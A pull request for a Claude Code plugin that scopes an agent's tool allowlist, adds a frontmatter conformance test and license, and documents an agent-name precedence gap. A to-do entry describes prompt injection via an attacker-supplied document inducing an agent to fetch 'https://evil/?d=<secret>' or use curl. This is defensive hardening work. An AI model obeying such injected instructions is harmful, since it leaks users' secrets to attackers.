### PR TITLE
fix(plugin): agent and manifest hygiene — PLUGIN-PREPROD-001 PR 4

### DIFF
--- a/.claude-plugin/marketplace.json
+++ b/.claude-plugin/marketplace.json
@@ -3,7 +3,7 @@
   "description": "BYO marketplace hosting the aidoc-flow Claude Code plugin (pre-1.0 preview). Spec-driven development for the 8-layer doc flow (BRD → IPLAN).",
   "owner": {
     "name": "vladm3105",
-    "email": "vla.myakota@gmail.com"
+    "url": "https://github.com/vladm3105"
   },
   "plugins": [
     {

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -12,6 +12,64 @@ this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.htm
 
 ## [Unreleased]
 
+### Fixed — one agent no longer inherits every tool; the plugin ships its license (2026-08-01)
+
+**PLUGIN-PREPROD-001 PR 4 of 5.** No version bump on any stream; the plugin's
+`0.24.0 → 0.25.0` cut is PR 5. Closes M2, L1, L6 and L7 of the 2026-07-31
+pre-production review.
+
+- **`requirements-analyst` inherited every tool, including `Write`, `Edit` and
+  `Bash`.** It was the only one of eleven agents declaring neither `tools:` nor
+  `model:`, and an agent that omits `tools:` does not get a narrower set — it
+  gets all of them. Scoped to `Read, Write, Edit, Grep, Glob, Bash, Skill,
+  WebFetch`, matching the other two spec-lane authors, and to `model: sonnet`
+  per the authoring tier `docs/AGENTS.md` documents. That file recorded the gap
+  honestly as `inherit` in two places; both now state the declared tier.
+- **A new conformance guard makes the omission fail the build.**
+  `tests/conformance/platforms/test_agent_frontmatter.py` asserts every agent
+  declares an explicit `tools:` allowlist and a `model:` drawn from the three
+  tiers `docs/AGENTS.md` defines. The existing manifest test covered agent
+  *identity* (`name`, `description`); nothing covered *scoping*, which is a
+  security property rather than a metadata one. `inherit` is deliberately not an
+  accepted model value — it is the unscoped state the guard exists to reject.
+  It also locks the read-only claim: an agent marked
+  `custom_fields.access: read-only` may hold no `Write`, `Edit` or
+  `NotebookEdit`. `Bash` is deliberately excluded from that set — the review
+  lenses genuinely shell out — which is why `docs/AGENTS.md` now says plainly
+  that read-only means *no editing tools plus an instruction*, not a sandbox.
+- **The plugin declared MIT and shipped no license text.** `LICENSE` now sits
+  inside `platforms/claude-code-plugin/`, so the installed artifact carries the
+  terms its `plugin.json` claims rather than relying on a repository root a
+  consumer never receives.
+- **`marketplace.json` no longer publishes a personal email.** `owner.email` is
+  optional in the marketplace schema and `owner.url` is an accepted alternative
+  ([Owner fields](https://code.claude.com/docs/en/plugin-marketplaces) — both
+  are `Required: No`; nothing in this repo vendors that schema, so the citation
+  is the source), so the address is replaced by the maintainer's GitHub profile.
+  An earlier plan anticipated a role address instead; that mailbox is not
+  provisioned, so the profile URL stands in. This narrows a
+  public manifest, not the address's exposure — it remains in this repository's
+  commit metadata.
+- **The `code-reviewer` collision is documented rather than renamed — and the
+  documentation says something sharper than the finding did.** Plugin agents
+  register under a scoped identifier (`aidoc-flow:code-reviewer`), so installing
+  this plugin cannot overwrite a consumer's own `code-reviewer`. That is only
+  half the story, and the reassuring half: a **bare** name is resolved by scope
+  precedence, where a plugin's `agents/` directory ranks lowest of five, below
+  `~/.claude/agents/`. A consumer who defines `code-reviewer` and asks for "the
+  code-reviewer" therefore reaches theirs, and this plugin's read-only gate is
+  never consulted. Renaming one file does not fix that — every dispatch is by
+  bare name — so `docs/AGENTS.md` § "Naming" now states the precedence rule, the
+  consequence that read-only is a property of *this* plugin's declaration rather
+  than of the name, and the gap itself.
+- **That gap is filed, not closed.** The plugin's own skills and the
+  `pm-orchestrator` delegation table dispatch by bare name, so on a machine
+  defining any of those names the plugin's instructions route to the consumer's
+  agent. Closing it means namespacing the dispatch references across roughly 45
+  files — out of scope for a hygiene stage, and tracked as
+  `PREPROD-L7-BARE-DISPATCH` / issue
+  [#417](https://github.com/vladm3105/aidoc-flow-framework/issues/417).
+
 ### Fixed — the saga driver stops wedging, stops clobbering its subprocess, and stops reporting success on runs that never converged (2026-08-01)
 
 **PLUGIN-PREPROD-001 PR 3 of 5.** No version bump on any stream; the plugin's

--- a/plans/FRAMEWORK-TODO.md
+++ b/plans/FRAMEWORK-TODO.md
@@ -56,6 +56,65 @@
 
 ## Open
 
+### `[plugin]` `PREPROD-L7-BARE-DISPATCH` — the plugin dispatches its agents by bare name, so a consumer's same-named agent wins → #417
+
+- *Context:* found 2026-08-01 by security review during PLUGIN-PREPROD-001 PR 4,
+  and **pre-existing**. Plugin agents register under a scoped identifier
+  (`aidoc-flow:code-reviewer`), so no definition is overwritten — but Claude Code
+  resolves a **bare** name by scope precedence, and a plugin's `agents/` is the
+  lowest of five (managed 1, `--agents` 2, `.claude/agents/` 3,
+  `~/.claude/agents/` 4, plugin 5); the higher-priority location wins. Every
+  dispatch reference this plugin ships is bare: `agents/pm-orchestrator.md:55`
+  (the delegation table of the one agent holding `Task`),
+  `skills/review-team/SKILL.md:60-71` (the lens → agent map), the same block in
+  the eight `doc-*-audit` skills, and `skills/doc-brd/SKILL.md:176`
+  (`subagent_type=requirements-analyst`) — 28 `subagent_type=` occurrences across
+  `skills/`.
+- *Impact:* a consumer who defines `code-reviewer` at any higher scope has the
+  plugin's read-only gate silently replaced by their own agent, which may hold
+  `Write`/`Edit`. `docs/AGENTS.md:32` states read-only as a security property, and
+  it is defeated with no error, warning, or log line.
+- *Fix shape:* namespace the dispatch **references**, not the definitions —
+  `` `code-reviewer` `` → `` `aidoc-flow:code-reviewer` `` across the delegation
+  and lens tables. Touches no agent filename, so it churns neither the
+  `tests/scripts/test-acceptance.sh:1719,2171` expectation strings nor the other
+  surfaces a rename would. **Verify first that `subagent_type` accepts the scoped
+  form**; the docs confirm it for `--agent` and @-mention and show scoped
+  identifiers (`my-plugin:review:security`), but do not state it for
+  `subagent_type`. If it does not, renaming the definitions is the only fix left
+  and this reopens as a rename.
+- *Not broken:* installation does not shadow or overwrite a consumer's agent, and
+  PR 4's `docs/AGENTS.md` §"Naming" documents the hazard for a human reader. This
+  entry is the machine-facing half.
+- *Stage:* after PLUGIN-PREPROD-001; not a release blocker for the `0.25.0` cut.
+
+### `[plugin]` `PREPROD-AGENT-WEBFETCH` — `WebFetch` is granted to 9 of 11 agents and used by no workflow
+
+- *Context:* found 2026-08-01 by security review during PLUGIN-PREPROD-001 PR 4.
+  `WebFetch` appears in 9 of 11 `agents/*.md` frontmatters and in **zero** skill
+  or agent bodies — no shipped workflow instructs any agent to fetch a URL. For
+  document-authoring agents whose inputs are a local template plus a local seed
+  file it is surplus, and it is the canonical prompt-injection exfiltration
+  primitive: an agent reading an attacker-supplied requirements document can be
+  induced to fetch `https://evil/?d=<secret>`.
+- *Fix shape:* drop `WebFetch` from the agents with no fetching workflow. Note
+  the counter-argument that keeps this LOW rather than MEDIUM — those agents also
+  hold `Bash`, so `curl` remains reachable; removing `WebFetch` narrows the
+  easiest path, not the only one. A real fix pairs it with the `Bash` question.
+- *Stage:* unscheduled.
+
+### `[docs]` `PREPROD-PLAN-TESTPATH` — the PR 4 plan's file table names a path that does not exist
+
+- *Context:* `plans/PLUGIN-PREPROD-001-PLAN.md:326` names
+  `tests/conformance/test_agent_frontmatter.py`; it shipped at
+  `tests/conformance/platforms/test_agent_frontmatter.py`, beside the 18 other
+  plugin-platform checks. The `platforms/` placement is correct — the adjacent
+  `:325` row (`test_plugin_hook_safety.py`, PR 1) is the one that is arguably
+  misplaced. Not fixed in PR 4 because editing a `plans/*-PLAN.md` makes it a
+  governance PR under the ≤3-doc-surface rule.
+- *Fix shape:* amend `:326` during PR 5, which closes the plan out anyway.
+- *Stage:* PR 5.
+
 ### `[plugin]` `SAGA-ALL-BRANCHES-FAILED-CLOSES` — a review where every lens failed still closes at exit 0
 
 - *Context:* found 2026-08-01 by review during PLUGIN-PREPROD-001 PR 3, and

--- a/platforms/claude-code-plugin/LICENSE
+++ b/platforms/claude-code-plugin/LICENSE
@@ -1,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 vladm3105
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

--- a/platforms/claude-code-plugin/agents/requirements-analyst.md
+++ b/platforms/claude-code-plugin/agents/requirements-analyst.md
@@ -6,6 +6,8 @@ description: >
   the SDD workflow. Specializes in requirements engineering, traceability analysis,
   coverage mapping, and quality validation - focuses on requirements methodology
   rather than code implementation.
+tools: Read, Write, Edit, Grep, Glob, Bash, Skill, WebFetch
+model: sonnet
 tags:
   - agent
   - requirements-engineering

--- a/platforms/claude-code-plugin/docs/AGENTS.md
+++ b/platforms/claude-code-plugin/docs/AGENTS.md
@@ -29,7 +29,7 @@ The `pm-orchestrator` is the PM seat the team plugs into — it sequences the li
 
 ### Read-only quality gates
 
-`code-reviewer`, `security-engineer`, and `traceability-auditor` are **read-only**. They report findings and a verdict but never edit, write, or commit. This preserves independent review (a reviewer that fixes its own findings cannot be trusted as a gate). The `software-engineer` applies the fixes, then re-requests review.
+`code-reviewer`, `security-engineer`, and `traceability-auditor` are **read-only**: none declares `Write` or `Edit`, so they report findings and a verdict rather than editing. This preserves independent review (a reviewer that fixes its own findings cannot be trusted as a gate). The `software-engineer` applies the fixes, then re-requests review. Note the limit of what the allowlist enforces — each also declares `Bash`, which can write, and only the agent's prompt confines it to inspection; see §"Naming".
 
 ### Model tiers
 
@@ -79,7 +79,7 @@ CHG (governance overlay — triggered on-demand when modifying any layer)
 | Agent | Lane | Model | Access | Delegation |
 |-------|------|-------|--------|-----------|
 | `pm-orchestrator` | Orchestration | opus | full + `Task` | spawns all 8 |
-| `requirements-analyst` | Spec | inherit | author | — |
+| `requirements-analyst` | Spec | sonnet | author | — |
 | `solutions-architect` | Spec | opus | author | — |
 | `test-architect` ★ | Spec | sonnet | author | — |
 | `software-engineer` | Execution | sonnet | full | — |
@@ -87,6 +87,48 @@ CHG (governance overlay — triggered on-demand when modifying any layer)
 | `code-reviewer` ★ | Quality gate | opus | read-only | — |
 | `security-engineer` | Quality gate | opus | read-only | — |
 | `traceability-auditor` ★ | Quality gate | haiku | read-only | — |
+
+### Naming — scoped identifiers, and why a bare name may not reach this plugin
+
+Claude Code registers a plugin's agents under a **scoped identifier**, so each of
+the eleven agents this plugin ships is `aidoc-flow:<name>` —
+`aidoc-flow:code-reviewer`. Installing this plugin therefore cannot overwrite or
+replace a `code-reviewer` you keep in `~/.claude/agents/`: both are registered,
+under different identifiers.
+
+**The scoped identifier is not what wins a bare name.** Claude Code resolves a
+same-named subagent by scope precedence, and a plugin's `agents/` directory is
+the lowest of the five scopes — managed settings (1), `--agents` (2),
+`.claude/agents/` (3), `~/.claude/agents/` (4), plugin (5). The rule is that when
+multiple subagents share a name, the higher-priority location wins. So if you
+already define `code-reviewer`, an unqualified request for "the code-reviewer"
+reaches **yours**, and this plugin's is never consulted.
+
+That matters because *read-only is a property of this plugin's declaration, not
+of the name*. Your `code-reviewer` carries its own `tools:` and may well write.
+Qualify the identifier — `aidoc-flow:code-reviewer` — whenever you mean this one
+and the bare name is one you also define.
+
+> ⚠️ **Known gap.** This plugin's own skills and the `pm-orchestrator` delegation
+> table still dispatch by **bare** name (`code-reviewer`, `synthesizer`, …). On a
+> machine that defines any of those names at a higher-priority scope, the
+> plugin's own instructions route to *your* agent rather than to the one
+> documented here — including for the read-only gates. Tracked as
+> `PREPROD-L7-BARE-DISPATCH` in `plans/FRAMEWORK-TODO.md`, issue
+> [#417](https://github.com/vladm3105/aidoc-flow-framework/issues/417).
+
+Two facts about the `tools:` declarations themselves:
+
+- **Every agent this plugin ships declares an explicit `tools:` allowlist and a
+  `model:`.** Omitting `tools:` does not narrow an agent — it inherits *every*
+  tool available to subagents, including `Write`, `Edit`, `Bash` and every MCP
+  tool. `tests/conformance/platforms/test_agent_frontmatter.py` fails the build
+  if any agent regresses to that state.
+- **The read-only gates declare no `Write` and no `Edit`** — that much is
+  enforced by the allowlist and locked by the same test. They *do* declare
+  `Bash`, which can write; their prompts confine it to inspection, but the
+  allowlist does not enforce that. Read "read-only" as *no editing tools, plus an
+  instruction* — not as a sandbox.
 
 ---
 
@@ -128,7 +170,7 @@ and the gate stays the deterministic structural floor + no unresolved P0/P1.
 - **Owns:** BRD → PRD → EARS. Formal requirements with SMART criteria, cumulative upstream tags, and SPEC-Ready scoring.
 - **Skills:** `doc-brd/prd/ears-*` families.
 - **Handoff:** validated PRD/EARS → Solutions Architect.
-- **Model:** inherit.
+- **Model:** sonnet.
 
 ### `solutions-architect` — Solutions Architect
 

--- a/tests/conformance/platforms/test_agent_frontmatter.py
+++ b/tests/conformance/platforms/test_agent_frontmatter.py
@@ -1,0 +1,134 @@
+"""Conformance: every plugin agent declares an explicit tool allowlist and model
+(PLUGIN-PREPROD-001 `PREPROD-M2`).
+
+An `agents/*.md` that omits `tools:` does not get a smaller tool set — it
+**inherits every tool**, including `Write`, `Edit` and `Bash`. So the omission is
+invisible in review (the file looks like any other agent) and silently grants the
+broadest possible access. `requirements-analyst.md` shipped that way through
+plugin `0.24.0`: it was the only one of eleven declaring neither key.
+
+`test_plugin_manifest.py::test_agents_have_name_and_description` already covers
+identity. This module covers the *scoping* half, which is a security property
+rather than a metadata one, and which nothing else in the suite asserts.
+
+The model check is not decoration: `docs/AGENTS.md` §"Model tiers" defines
+exactly three tiers, and an agent naming anything else contradicts the shipped
+documentation of its own roster.
+"""
+
+from __future__ import annotations
+
+import re
+import unittest
+
+import yaml
+from _spec import REPO_ROOT
+
+PLUGIN = REPO_ROOT / "platforms" / "claude-code-plugin"
+AGENTS = PLUGIN / "agents"
+
+# The three tiers documented in platforms/claude-code-plugin/docs/AGENTS.md
+# §"Model tiers". `inherit` is deliberately absent — it is the unscoped state
+# this guard exists to reject.
+DOCUMENTED_MODELS = frozenset({"opus", "sonnet", "haiku"})
+
+# A single entry in the comma-separated `tools:` string, e.g. `Read` or
+# `mcp__brave-search__brave_web_search` — MCP server names may contain hyphens.
+# Deliberately strict: it admits a bare tool name only, not the
+# `Tool(scope:*)` form, which is settings-level permission syntax and is not
+# part of the agent `tools:` field.
+TOOL_TOKEN = re.compile(r"^[A-Za-z][A-Za-z0-9_-]*$")
+
+# Agents whose `custom_fields.access` says read-only must not hold an editing
+# tool. `Bash` is deliberately NOT in this set: `traceability-auditor` and the
+# review lenses genuinely shell out to run the validation tooling. So this
+# guards what the allowlist can enforce, which is narrower than the read-only
+# claim itself — see docs/AGENTS.md §"Naming".
+EDITING_TOOLS = frozenset({"Write", "Edit", "NotebookEdit"})
+
+
+def _frontmatter(path):
+    text = path.read_text(encoding="utf-8")
+    if not text.startswith("---"):
+        return {}
+    end = text.find("\n---", 3)
+    if end == -1:
+        return {}
+    data = yaml.safe_load(text[3:end])
+    return data if isinstance(data, dict) else {}
+
+
+def _agent_files():
+    return sorted(p for p in AGENTS.glob("*.md") if p.name != "README.md")
+
+
+class AgentFrontmatter(unittest.TestCase):
+    def test_agents_directory_is_populated(self):
+        """Vacuity guard: every other test here iterates the glob, so a moved or
+        renamed `agents/` directory would make them all pass on zero files."""
+        self.assertTrue(AGENTS.is_dir(), f"missing {AGENTS}")
+        self.assertTrue(_agent_files(), f"no agent definitions under {AGENTS}")
+
+    def test_every_agent_declares_tools(self):
+        """No agent may inherit the full tool set by omission."""
+        for agent in _agent_files():
+            with self.subTest(agent=agent.name):
+                fm = _frontmatter(agent)
+                self.assertIn(
+                    "tools",
+                    fm,
+                    f"{agent.name} declares no 'tools:' — it inherits every tool, "
+                    "including Write, Edit and Bash. Declare an explicit allowlist.",
+                )
+                tools = fm["tools"]
+                self.assertIsInstance(
+                    tools, str, f"{agent.name} 'tools:' must be a comma-separated string"
+                )
+                names = [t.strip() for t in tools.split(",")]
+                self.assertTrue(
+                    names and all(names), f"{agent.name} has an empty entry in 'tools:'"
+                )
+                for name in names:
+                    self.assertRegex(
+                        name, TOOL_TOKEN, f"{agent.name} lists a malformed tool: {name!r}"
+                    )
+
+    def test_read_only_agents_hold_no_editing_tool(self):
+        """`docs/AGENTS.md` presents the review gates as read-only, which is a
+        security claim. `custom_fields.access` already records it per agent, so
+        the claim is machine-checkable — and until now nothing checked it."""
+        checked = []
+        for agent in _agent_files():
+            fm = _frontmatter(agent)
+            if (fm.get("custom_fields") or {}).get("access") != "read-only":
+                continue
+            checked.append(agent.name)
+            with self.subTest(agent=agent.name):
+                names = {t.strip() for t in str(fm.get("tools", "")).split(",")}
+                self.assertFalse(
+                    names & EDITING_TOOLS,
+                    f"{agent.name} is declared access: read-only but holds "
+                    f"{sorted(names & EDITING_TOOLS)}",
+                )
+        self.assertTrue(
+            checked,
+            "no agent declares custom_fields.access: read-only — either the key "
+            "was renamed or the review gates lost their marking; this test "
+            "would otherwise pass by checking nothing",
+        )
+
+    def test_every_agent_declares_a_documented_model(self):
+        for agent in _agent_files():
+            with self.subTest(agent=agent.name):
+                fm = _frontmatter(agent)
+                self.assertIn("model", fm, f"{agent.name} declares no 'model:'")
+                self.assertIn(
+                    fm["model"],
+                    DOCUMENTED_MODELS,
+                    f"{agent.name} declares model {fm['model']!r}, which is not one of "
+                    f"the tiers docs/AGENTS.md documents ({sorted(DOCUMENTED_MODELS)})",
+                )
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
**PLUGIN-PREPROD-001 PR 4 of 5** — agent and manifest hygiene. Closes `M2`, `L1`,
`L6` and `L7` of the 2026-07-31 pre-production review. No version bump on any
stream; the plugin's `0.24.0 → 0.25.0` cut is PR 5.

## What changed

| Finding | Resolution |
| --- | --- |
| **M2** | `agents/requirements-analyst.md` was the only one of eleven declaring neither `tools:` nor `model:`, so it inherited every tool available to subagents — `Write`, `Edit`, `Bash` and every MCP tool. Scoped to match the two other spec-lane authors; `model: sonnet` per the authoring tier `docs/AGENTS.md` documents. |
| **M2 guard** | New `tests/conformance/platforms/test_agent_frontmatter.py`. Written first, confirmed failing on exactly `requirements-analyst.md` and passing on the other ten, then fixed. |
| **L1** | `platforms/claude-code-plugin/LICENSE` — the installed artifact declared MIT and shipped no terms. |
| **L6** | `marketplace.json` `owner.email` → `owner.url` (founder's call). Narrows a public manifest, not the address's exposure. |
| **L7** | Documented, not renamed — see below. |

## L7 — the documentation says something sharper than the finding did

The finding assumed a name collision. Half of that is wrong and half is worse
than stated, and the reassuring half hides the other:

- Plugin agents register under a **scoped identifier** (`aidoc-flow:code-reviewer`),
  so installing this plugin genuinely cannot overwrite a consumer's own agent.
- But a **bare** name is resolved by *scope precedence*, and a plugin's `agents/`
  directory ranks **lowest of five**, below `~/.claude/agents/`. A consumer who
  defines `code-reviewer` and asks for "the code-reviewer" reaches theirs — this
  plugin's read-only gate is never consulted.

Every dispatch reference the plugin ships is bare, so renaming one file would not
have closed it. `docs/AGENTS.md` §"Naming" now states the precedence rule, the
consequence that read-only is a property of *this* plugin's declaration rather
than of the name, and the gap itself. The sweep is filed as
`PREPROD-L7-BARE-DISPATCH` / #417.

## The read-only claim is now enforced as far as an allowlist can enforce it

`docs/AGENTS.md:32` stated read-only as a security property; nothing checked it.
The new guard asserts that an agent marked `custom_fields.access: read-only`
holds no `Write`, `Edit` or `NotebookEdit`. `Bash` is deliberately **excluded**
from that set — `traceability-auditor` and the review lenses genuinely shell out
— which is exactly why the doc now says plainly that read-only means *no editing
tools plus an instruction*, not a sandbox. Overstating it was the MAJOR finding
below.

Mutation-tested rather than assumed: granting `Write` to a read-only agent is
caught and names the file; stripping `access: read-only` from every agent trips
the vacuity guard instead of passing silently.

## Verification

- Conformance **357 → 361**, acceptance-deterministic **64**, `sdd_doc_lint` **5**
- `pre-commit run --all-files` clean

## Review

Multi-agent self-review per OPS-0065 — `code-reviewer` + `security-auditor` +
`documentation-specialist`, parallel dispatch, 1 fold cycle:

- **1 MAJOR**, raised independently by two reviewers — the `docs/AGENTS.md` text
  this PR adds asserted read-only as a declaration-level guarantee that `Bash`
  defeats. Corrected, and the enforceable part locked by a test.
- **1 MEDIUM** — the original L7 rationale claimed bare-name resolution is routed
  by agent *description*. The documented rule is scope precedence. Corrected
  against the source, and the residual gap filed as #417 rather than papered over.
- **3 MINOR** — `TOOL_TOKEN` rejected the hyphenated MCP form its own comment
  advertised; "every agent above" claimed 11 under a 9-row table; the plan's
  file-table path drift (deferred to PR 5 as `PREPROD-PLAN-TESTPATH`, since
  editing a `plans/*-PLAN.md` would make this a governance PR).
- **1 LOW** filed as `PREPROD-AGENT-WEBFETCH` — `WebFetch` is granted to 9 of 11
  agents and used by no shipped workflow.

Doc surfaces: 3 (`CHANGELOG.md`, `plans/FRAMEWORK-TODO.md`, `docs/AGENTS.md`).

## Follow-ups filed

- #417 — bare-name dispatch (the machine-facing half of L7)
- `PREPROD-AGENT-WEBFETCH`, `PREPROD-PLAN-TESTPATH` in `plans/FRAMEWORK-TODO.md`
